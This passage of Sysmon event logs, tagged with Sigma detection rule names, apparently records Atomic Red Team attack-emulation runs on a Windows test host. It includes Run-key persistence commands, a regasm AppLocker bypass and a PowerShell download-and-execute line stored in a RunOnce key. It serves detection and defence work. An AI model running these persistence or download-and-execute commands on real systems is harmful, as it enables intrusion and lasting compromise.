14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3578,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.221461Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3579,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.240767Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Stop Windows Service"],"event":{"Event":{"EventData":{"CommandLine":"sc.exe stop AtomicTestService","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D739-5D31-0000-00104CB72600","ParentProcessId":5000,"ProcessGuid":"747F3D96-D739-5D31-0000-0010B6B92600","ProcessId":980,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:09.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3584,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:09.176040Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:09.291"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3587,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:09.310810Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3589,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:26.222431Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3590,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:26.246190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:47.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3592,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:49.679320Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.201"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3593,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.219598Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ParentProcessId":6584,"ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.244"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3594,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.258049Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Path\\AtomicRedTeam.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"RuleName":"Persistence - via Run key","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team","UtcTime":"2019-07-19 14:44:53.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3595,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.292455Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ProcessId":5824,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.314"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3596,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.330492Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ParentProcessId":5824,"ProcessGuid":"747F3D96-D765-5D31-0000-001022C02800","ProcessId":2912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.337"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3597,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.349171Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ProcessId":3216,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3600,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.075725Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ParentProcessId":3216,"ProcessGuid":"747F3D96-D772-5D31-0000-001010E82800","ProcessId":3772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.132"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3601,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.137175Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ProcessId":6472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3603,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.196458Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ParentProcessId":6472,"ProcessGuid":"747F3D96-D772-5D31-0000-001083ED2800","ProcessId":6120,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3604,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.213488Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"Details":"powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`\")\"","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence - via Run key","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun","UtcTime":"2019-07-19 14:45:19.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3607,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:19.483250Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Startup Folder File Write"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-18 20:53:13.080","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk","UtcTime":"2019-07-19 14:45:31.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3609,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:31.287863Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ProcessId":5800,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3613,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:55.681219Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll","Company":"Microsoft 